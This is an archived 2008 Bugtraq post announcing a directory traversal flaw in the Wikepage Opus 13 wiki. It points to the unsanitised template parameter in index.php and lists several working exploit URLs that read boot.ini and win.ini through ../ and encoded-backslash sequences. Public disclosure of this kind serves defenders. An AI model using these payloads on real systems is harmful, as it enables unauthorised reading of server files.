lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20080407093312.5088.qmail@securityfocus.com>
Date: 7 Apr 2008 09:33:12 -0000
From: virangar_nml@...oo.com
To: bugtraq@...urityfocus.com
Subject: Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility

	     ##############################################################################
             #                                                                            #
             #  ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ::::.... #           
             ##############################################################################

## AUTHOR :  Virangar Security Team (A.Nosrati ) 
## Email  :  Virangar_nml@...oo.com or 9120000000@...oo.com  or Virangar_SECRET@...mail.com
##ICQ:       445117030 
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversa

Virangar Security Team
VIRANGAR UNDER GR0UND TEAM 
 
Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site :  http://www.wikepage.org/ 
(Download http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)

-----------------------------------
vulnerability Path : 

vuln code in [localhost]/wikepage/index.php
Sample Of vulnerabil  Line : $ templatefile=$_GET['template'];  (Line 586) And More .....


Exploit :
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini  
or 
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
or 
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or 
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
and more ........


Good Luck 
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ